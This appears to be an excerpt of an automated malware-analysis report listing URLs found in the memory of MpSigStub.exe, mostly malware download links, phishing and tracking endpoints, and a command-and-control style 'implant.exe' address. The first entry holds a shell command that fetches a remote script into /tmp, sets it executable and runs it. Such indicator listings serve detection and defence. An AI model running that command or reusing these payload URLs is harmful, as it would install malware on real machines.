Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: http://linux.ghststr.com/lllol/0-o/tmp/s.sh&&cd/tmp/&&chmod777s.sh&&bashs.sh-o-2
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: http://lipostes.tk/98765.pdf
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://lithi.io/file/
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp String found in binary or memory: http://livefrom.ge/modules/mod_swfobject/enfo.php
Source: MpSigStub.exe, 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: http://liveswindows.cyou/opzi0n1.dll
Source: MpSigStub.exe, 00000023.00000003.18334190857.0000015B1A60C000.00000004.00000001.sdmp String found in binary or memory: http://liveupdatesnet.com/
Source: MpSigStub.exe, 00000023.00000003.18335134155.0000015B1A914000.00000004.00000001.sdmp String found in binary or memory: http://lk2gaflsgh.jgy658snfyfnvh.com/
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://ll.protected.secured.adobe
Source: MpSigStub.exe, 00000023.00000003.18339677269.0000015B1AB04000.00000004.00000001.sdmp String found in binary or memory: http://lnk.direct/xzx
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: http://lo0oading.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://local45.net
Source: MpSigStub.exe, 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp String found in binary or memory: http://localhost/st.php
Source: MpSigStub.exe, 00000023.00000003.18329340155.0000015B1AC0C000.00000004.00000001.sdmp String found in binary or memory: http://localhost:4173/BaiduClickerClient.asmx?WSDLx
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://localhost:62338/Chipsetsync.asmx
Source: MpSigStub.exe, 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: http://localhost:8000/cmd.exe
Source: MpSigStub.exe, 00000023.00000003.18322243559.0000015B1A504000.00000004.00000001.sdmp String found in binary or memory: http://localstormwatch.com
Source: MpSigStub.exe, 00000023.00000003.18322243559.0000015B1A504000.00000004.00000001.sdmp String found in binary or memory: http://localstormwatch.comx
Source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp String found in binary or memory: http://log.dataurls.com/log/settings.json
Source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp String found in binary or memory: http://log.dataurls.com/log/settings.jsonxN
Source: MpSigStub.exe, 00000023.00000003.18306868118.0000015B1AA1D000.00000004.00000001.sdmp String found in binary or memory: http://log.newhybridhome.com/personal.dll
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://log.soomeng.com/wb/jdq/?mac=%s
Source: MpSigStub.exe, 00000023.00000003.18333194957.0000015B1AC4F000.00000004.00000001.sdmp String found in binary or memory: http://logger.mobi
Source: MpSigStub.exe, 00000023.00000003.18321417418.0000015B1B6C0000.00000004.00000001.sdmp String found in binary or memory: http://logs-01.loggly.com/inputs
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://loisnfernandez.us/Gold/aafile.exe
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://lolitaadultfilehost.com/pc/page/set_reg.php?af_num=&cuid=
Source: MpSigStub.exe, 00000023.00000003.18313952102.0000015B1B3A0000.00000004.00000001.sdmp String found in binary or memory: http://lookfor.cc/sp.php?pin=%05d
Source: MpSigStub.exe, 00000023.00000003.18313952102.0000015B1B3A0000.00000004.00000001.sdmp String found in binary or memory: http://lookfor.cc?pin=%05d
Source: MpSigStub.exe, 00000023.00000003.18313952102.0000015B1B3A0000.00000004.00000001.sdmp String found in binary or memory: http://looking-for.cc
Source: MpSigStub.exe, 00000023.00000003.18313952102.0000015B1B3A0000.00000004.00000001.sdmp String found in binary or memory: http://looking-for.ccx
Source: MpSigStub.exe, 00000023.00000003.18326614272.0000015B1A717000.00000004.00000001.sdmp String found in binary or memory: http://loscuerposgloriosos.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18316647369.0000015B1B557000.00000004.00000001.sdmp String found in binary or memory: http://lost.to/in.cgi
Source: MpSigStub.exe, 00000023.00000003.18349004213.0000015B1A9DB000.00000004.00000001.sdmp String found in binary or memory: http://lostart.info/js/gs.js
Source: MpSigStub.exe, 00000023.00000003.18302834450.0000015B1BFE8000.00000004.00000001.sdmp String found in binary or memory: http://lowdeck.net/kt2si/2efinys.exe
Source: MpSigStub.exe, 00000023.00000003.18302834450.0000015B1BFE8000.00000004.00000001.sdmp String found in binary or memory: http://lowdeck.net/kt2si/c2syst.exe
Source: MpSigStub.exe, 00000023.00000003.18302834450.0000015B1BFE8000.00000004.00000001.sdmp String found in binary or memory: http://lowdeck.net/kt2si/drmlsh.exe
Source: MpSigStub.exe, 00000023.00000003.18302834450.0000015B1BFE8000.00000004.00000001.sdmp String found in binary or memory: http://lowdeck.net/kt2si/icnsys.exe
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://loygf-99.gq/
Source: MpSigStub.exe, 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp String found in binary or memory: http://lrelectronics.in/czffkte/
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp String found in binary or memory: http://ludnica.uk.to/youtube.xpi
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp String found in binary or memory: http://luport.com/templates/konkur/language/m
Source: MpSigStub.exe, 00000023.00000003.18281872533.0000015B1C527000.00000004.00000001.sdmp String found in binary or memory: http://luyitaw.com/okasle.exe
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://lychee22.grey.ero0101.com/set_inf.php?id=ero257.wmv&cid=
Source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp String found in binary or memory: http://m.mworld.vn/MWorld30/data20.xm?a=getip&g=3&sex=Android
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://mabira.net/traff/controller.php?&ver=8&uid=
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp String found in binary or memory: http://macr.microfsot.com/noindex.js
Source: MpSigStub.exe, 00000023.00000003.18334190857.0000015B1A60C000.00000004.00000001.sdmp String found in binary or memory: http://madthumbs.com/archive/
Source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp String found in binary or memory: http://mahathi2.ondemandcreative.com/24.gif
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: http://mail.autoshops.online/gbh.exe
Source: MpSigStub.exe, 00000023.00000003.18317322207.0000015B1B5DB000.00000004.00000001.sdmp String found in binary or memory: http://mail.bg
Source: RegAsm.exe, 00000008.00000002.21904829624.000000001E502000.00000004.00000001.sdmp String found in binary or memory: http://mail.cselegance.com
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://mail.daum.net/kocl/
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://mail.google.com/mail/
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp String found in binary or memory: http://mail.madcoffee.com/index.php
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://mail.rambler.ru/mail/mail.cgi?mode=compose
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://mail.vodafone.co.uk/
Source: MpSigStub.exe, 00000023.00000003.18292431996.0000015B1BA3D000.00000004.00000001.sdmp String found in binary or memory: http://makevalue.com
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://maktoob.yahoo.com/
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: http://maldonaaloverainc.com/
Source: MpSigStub.exe, 00000023.00000003.18427196191.0000015B1AB46000.00000004.00000001.sdmp String found in binary or memory: http://malepad.ru:8080/unmount.js
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://malikberry.com/files101/htaanyinwa.hta
Source: MpSigStub.exe, 00000023.00000003.18430078945.0000015B1C0AE000.00000004.00000001.sdmp String found in binary or memory: http://malikberry.com/files101/htamandela.hta
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://malikberry.com/files101/htazeco.hta
Source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp String found in binary or memory: http://malwarec2domain.com:3550/implant.exe
Source: MpSigStub.exe, 00000023.00000003.18307169245.0000015B1A4C3000.00000004.00000001.sdmp String found in binary or memory: http://malwaredestructor.com/?aid=347
Source: MpSigStub.exe, 00000023.00000003.18307169245.0000015B1A4C3000.00000004.00000001.sdmp String found in binary or memory: http://malwaredestructor.com/download.php?aid=347
Source: MpSigStub.exe, 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp String found in binary or memory: http://man-u.net/vb/send.php
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: http://manage1lnk.pw
Source: MpSigStub.exe, 00000023.00000003.18311861284.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://march262020.club/files/
Source: MpSigStub.exe, 00000023.00000003.18311861284.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://march262020.com/files/
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://margate-pawn.com?
Source: MpSigStub.exe, 00000023.00000003.18326506118.0000015B1A705000.00000004.00000001.sdmp String found in binary or memory: http://mariafordnude.com/wp/wp-admin/css/colors/coffee/reportexcelindeed.php
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://maribit.com/count11.php
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://maringareservas.com.br/queda/index.php
Source: MpSigStub.exe, 00000023.00000003.18342870635.0000015B1AB89000.00000004.00000001.sdmp String found in binary or memory: http://markpolak.com
Source: MpSigStub.exe, 00000023.00000003.18296359788.0000015B1C251000.00000004.00000001.sdmp String found in binary or memory: http://masgiO.info/cd/cd.php?id=%s&ver=g
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://mastic52.ivory.ero0101.com/set_inf.php?id=ero257.wmv&sid=
Source: MpSigStub.exe, 00000023.00000003.18303445859.0000015B1B86F000.00000004.00000001.sdmp String found in binary or memory: http://mastiway.me/wp-includes/
Source: MpSigStub.exe, 00000023.00000003.18434111043.0000015B1AF23000.00000004.00000001.sdmp String found in binary or memory: http://mattagland.co.uk/viky/adobefile/index.htm)
Source: MpSigStub.exe, 00000023.00000003.18334520035.0000015B1A6C6000.00000004.00000001.sdmp String found in binary or memory: http://max-stats.com
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://mea45.com/tp/download.php?file=ota4nda5nzm4nl9fx19zzxzrzgl6ztjkcy5legu=-o%appdata%
Source: MpSigStub.exe, 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp String found in binary or memory: http://mealpackage.biz/wp-admin/nbn3x/
Source: MpSigStub.exe, 00000023.00000003.18293334552.0000015B1BC8E000.00000004.00000001.sdmp String found in binary or memory: http://media.downloadmediacentral.com/law/?decinformation=
Source: MpSigStub.exe, 00000023.00000003.18346670516.0000015B1AC31000.00000004.00000001.sdmp String found in binary or memory: http://media.licenseacquisition.org/drm_prompt.php
Source: MpSigStub.exe, 00000023.00000003.18320598062.0000015B1B598000.00000004.00000001.sdmp String found in binary or memory: http://media.vit
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://mediabusnetwork.com/phandler.php?
Source: MpSigStub.exe, 00000023.00000003.18307169245.0000015B1A4C3000.00000004.00000001.sdmp String found in binary or memory: http://mediabusnetwork.com/preconfirm.php?aid=
Source: MpSigStub.exe, 00000023.00000003.18346670516.0000015B1AC31000.00000004.00000001.sdmp String found in binary or memory: http://mediaprovider.info/law/?decinformation=
Source: MpSigStub.exe, 00000023.00000003.18330938423.0000015B1AA81000.00000004.00000001.sdmp String found in binary or memory: http://mediastop.zigg.me
Source: MpSigStub.exe, 00000023.00000003.18330938423.0000015B1AA81000.00000004.00000001.sdmp String found in binary or memory: http://mediazone.uni.me/?id=
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://mega975.com.ar/sales-invoice/
Source: MpSigStub.exe, 00000023.00000003.18292431996.0000015B1BA3D000.00000004.00000001.sdmp String found in binary or memory: http://megadowl.com/terms-ru.html
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://meganetop.co.jp/imanager/favicon.php
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://meitao886.com/vass/vasss.doc
Source: MpSigStub.exe, 00000023.00000003.18310002934.0000015B1B40D000.00000004.00000001.sdmp String found in binary or memory: http://mekund.com/mkcxskjd.exe
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://melmat.cf/obago.doc
Source: MpSigStub.exe, 00000023.00000003.18334190857.0000015B1A60C000.00000004.00000001.sdmp String found in binary or memory: http://members.concealarea.com/
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: http://members.giftera.org
Source: MpSigStub.exe, 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp String found in binary or memory: http://members.xoom.com/devsfort/index.html
Source: MpSigStub.exe, 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp String found in binary or memory: http://members.xoom.com/devsfort/index.htmlg
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp String found in binary or memory: http://memberservices.passport.net/memberservice.srf
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://metclix.com
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://mexicorxonline.com/glad/imagenes.html?disc=abuse&amp;code=7867213
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: http://mfjr.info/n2l/tmp/m.vbs
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://michiganpppp.com/work/doc/9.doc
Source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp String found in binary or memory: http://microhelptech.com/gotoassist/
Source: MpSigStub.exe, 00000023.00000003.18303365623.0000015B1C05E000.00000004.00000001.sdmp String found in binary or memory: http://microsoft.browser-security-center.com/blocked.php?id=
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://microsoft.erlivia.ltd/jikolo.doc
Source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp String found in binary or memory: http://microsoftdata.linkpc.net/
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp String found in binary or memory: http://midfielders.ru/in.cgi?3&group=gdz&seoref=http%3a%2f%2fwww.google.com%2furl%3fsa%3dt%26rct%3dj
Source: MpSigStub.exe, 00000023.00000003.18323230598.0000015B1B134000.00000004.00000001.sdmp String found in binary or memory: http://midweekspecials.com/mjrtnfznqsbl/nbsa_
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: http://millennium-traders.info
Source: MpSigStub.exe, 00000023.00000003.18333278800.0000015B1AC5E000.00000004.00000001.sdmp String found in binary or memory: http://minetopsforums.ru/new_link3.php?site=
Source: MpSigStub.exe, 00000023.00000003.18333278800.0000015B1AC5E000.00000004.00000001.sdmp String found in binary or memory: http://minetopsforums.ru/new_link3.php?site=af
Source: MpSigStub.exe, 00000023.00000003.18433465792.0000015B1B723000.00000004.00000001.sdmp String found in binary or memory: http://mining.eligius.st:8337
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: http://mio98.hk/js_f.php?v=0.0
Source: MpSigStub.exe, 00000023.00000003.18346670516.0000015B1AC31000.00000004.00000001.sdmp String found in binary or memory: http://misc.wcd.qq.com/app?packageName=pcqqbrowser&channelId=81529
Source: MpSigStub.exe, 00000023.00000003.18316647369.0000015B1B557000.00000004.00000001.sdmp String found in binary or memory: http://missing-codecs.net
Source: MpSigStub.exe, 00000023.00000003.18349004213.0000015B1A9DB000.00000004.00000001.sdmp String found in binary or memory: http://missing-codecs.org/download/missing_file
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: http://mitotl.com.mx/ups.com/
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp String found in binary or memory: http://mixbunch.cn/thread.html
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp String found in binary or memory: http://mmwrlridbhmibnr.ml/liverpool-fc-news/features/
Source: MpSigStub.exe, 00000023.00000003.18299634028.0000015B1AF1A000.00000004.00000001.sdmp String found in binary or memory: http://mndyprivatecloudshareandfileprotecthmvb.freeddns.org/receipt/invoice_
Source: MpSigStub.exe, 00000023.00000003.18339366931.0000015B1C174000.00000004.00000001.sdmp String found in binary or memory: http://mnrr.space/c1.xmlx
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp String found in binary or memory: http://mobilemusicservice.de/43t3f/45y4g.exe
Source: MpSigStub.exe, 00000023.00000003.18318671001.0000015B1C4A2000.00000004.00000001.sdmp String found in binary or memory: http://mobilepcstarterkit.com/
Source: MpSigStub.exe, 00000023.00000003.18345035369.0000015B1B176000.00000004.00000001.sdmp String found in binary or memory: http://modernizr.com
Source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp String found in binary or memory: http://mods1401z.webcindario.com
Source: MpSigStub.exe, 00000023.00000003.18324547737.0000015B1B0B1000.00000004.00000001.sdmp String found in binary or memory: http://mog.com/
Source: MpSigStub.exe, 00000023.00000003.18307753022.0000015B1B767000.00000004.00000001.sdmp String found in binary or memory: http://mog.com/a
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp String found in binary or memory: http://moha-group.ir/nazy/doc/neworder.doc
Source: MpSigStub.exe, 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: http://mondaynews.tk/cam/cm.php?v=
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp String found in binary or memory: http://monergismbooks.com/
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp String found in binary or memory: http://monergismbooks.com/modules/reportfedexnew.php
Source: MpSigStub.exe, 00000023.00000003.18281872533.0000015B1C527000.00000004.00000001.sdmp String found in binary or memory: http://monergismbooks.com/upgrade/reportdhlnew.php
Source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp String found in binary or memory: http://montiera.com//favicon.ico
Source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp String found in binary or memory: http://montiera.com//favicon.icoa
Source: MpSigStub.exe, 00000023.00000003.18293662919.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: http://mootolola.com/url/YU_ggsetup.html?1218x
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://morris-law-firm.com?
Source: MpSigStub.exe, 00000023.00000003.18430078945.0000015B1C0AE000.00000004.00000001.sdmp String found in binary or memory: http://moscow1.online/proxy/assno.exe
Source: MpSigStub.exe, 00000023.00000003.18430078945.0000015B1C0AE000.00000004.00000001.sdmp String found in binary or memory: http://moscow1.online/proxy/skapoland.exe
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://mosrezerv.ru/ups/
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp String found in binary or memory: http://moveis-schuster-com.ga/Order.jpg
Source: MpSigStub.exe, 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp String found in binary or memory: http://moveisterrra.com/gb/add.php
Source: MpSigStub.exe, 00000023.00000003.18320270470.0000015B1B515000.00000004.00000001.sdmp String found in binary or memory: http://movie1-share123vn.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18303772420.0000015B1B8F2000.00000004.00000001.sdmp String found in binary or memory: http://mp.profittrol.com/
Source: MpSigStub.exe, 00000023.00000003.18335733371.0000015B1B82C000.00000004.00000001.sdmp String found in binary or memory: http://mp3.baidu.com/
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://mp3.baidu.com/m?tn=
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://mp3.baidu.com/m?tn=baidump3lyric&ct=
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://mp3.zhongsou.com/m?w=%s
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: http://mp3codecdownload.com
Source: MpSigStub.exe, 00000023.00000003.18316647369.0000015B1B557000.00000004.00000001.sdmp String found in binary or memory: http://mp3codecinstall.net/xcdc/installx?id=
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: http://mrbfile.xyz
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp String found in binary or memory: http://mrbfile.xyz/sql/syslib.dll
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: http://mrbftp.xyz
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp String found in binary or memory: http://mrdcontact.com/purchaseneworder.doc
Source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp String found in binary or memory: http://msjupdate.com/ff/extensions/update.rdf
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: http://msonlineservers.tk/parcel/dugdhl.php
Source: MpSigStub.exe, 00000023.00000003.18309645507.0000015B1A404000.00000004.00000001.sdmp String found in binary or memory: http://muahangvn.blogspot.com
Source: MpSigStub.exe, 00000023.00000003.18427196191.0000015B1AB46000.00000004.00000001.sdmp String found in binary or memory: http://mudu.rugeh.ru
Source: MpSigStub.exe, 00000023.00000003.18430078945.0000015B1C0AE000.00000004.00000001.sdmp String found in binary or memory: http://musah.info/
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://music.cn.yahoo.com/lyric.html?p=%s
Source: MpSigStub.exe, 00000023.00000003.18284212320.0000015B1B935000.00000004.00000001.sdmp String found in binary or memory: http://music.emmigo.in/?r=wmp&title=
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://music.soso.com/q?sc=mus&w=%s
Source: MpSigStub.exe, 00000023.00000003.18284212320.0000015B1B935000.00000004.00000001.sdmp String found in binary or memory: http://music.tfeed.info/?r=wmp&title=
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: http://muzdownload.com
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://my-save-img.ru/
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://my-save-img.ru/ip2.php
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: http://my-speak.eu/csioj.exe
Source: MpSigStub.exe, 00000023.00000003.18330938423.0000015B1AA81000.00000004.00000001.sdmp String found in binary or memory: http://mybestofferstoday.com/cgi-bin/main.cgi?__rnd__
Source: MpSigStub.exe, 00000023.00000003.18342184671.0000015B1C358000.00000004.00000001.sdmp String found in binary or memory: http://mydirecttube.com/
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: http://myip.dnsomatic.com
Source: MpSigStub.exe, 00000023.00000003.18433124639.0000015B1B6E2000.00000004.00000001.sdmp String found in binary or memory: http://myliverpoolnews.cf/liverpool-fc-news/features/
Source: MpSigStub.exe, 00000023.00000003.18315106599.0000015B1B858000.00000004.00000001.sdmp String found in binary or memory: http://myplanet.group/xuxzryvq1/ind.html
Source: MpSigStub.exe, 00000023.00000003.18349339011.0000015B1A999000.00000004.00000001.sdmp String found in binary or memory: http://myredir.net/K_
Source: MpSigStub.exe, 00000023.00000003.18309335590.0000015B1AFA8000.00000004.00000001.sdmp String found in binary or memory: http://mysearchpage.biz/customizesearch.html
Source: MpSigStub.exe, 00000023.00000003.18309335590.0000015B1AFA8000.00000004.00000001.sdmp String found in binary or memory: http://mysearchpage.biz/home.html
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp String found in binary or memory: http://mysibrand.info/e.js
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp String found in binary or memory: http://mysibrand.info/s.js
Source: MpSigStub.exe, 00000023.00000003.18330938423.0000015B1AA81000.00000004.00000001.sdmp String found in binary or memory: http://mytube.4l.cl/?id=4&watch=zryxo7
Source: MpSigStub.exe, 00000023.00000003.18289622866.0000015B1BD96000.00000004.00000001.sdmp String found in binary or memory: http://mytube.hs.vc/
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://myyobe.biz?
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://myyogaberry.com?
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://n5wo.lolitasexfootube.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: http://n7pv51t.sed.odtllc.net
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://naka4al.ru/tds/go.php?sid=1
Source: MpSigStub.exe, 00000023.00000003.18331238413.0000015B1AAC2000.00000004.00000001.sdmp String found in binary or memory: http://name.cnnic.
Source: MpSigStub.exe, 00000023.00000003.18331238413.0000015B1AAC2000.00000004.00000001.sdmp String found in binary or memory: http://name.cnnic.cn/cn.dll
Source: MpSigStub.exe, 00000023.00000003.18331238413.0000015B1AAC2000.00000004.00000001.sdmp String found in binary or memory: http://name.cnnic.cn/cn.dll?charset=utf-8&name=
Source: MpSigStub.exe, 00000023.00000003.18331238413.0000015B1AAC2000.00000004.00000001.sdmp String found in binary or memory: http://name.cnnic.cn/cn.dll?pid=
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: http://nameservicehosting3.in//load.php?spl=javad
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://nation.eromariaporno.net/pc/page/set_reg.php?af_code=&cuid=
Source: MpSigStub.exe, 00000023.00000003.18322924550.0000015B1B0F3000.00000004.00000001.sdmp String found in binary or memory: http://navigation.iwatchavi.com/
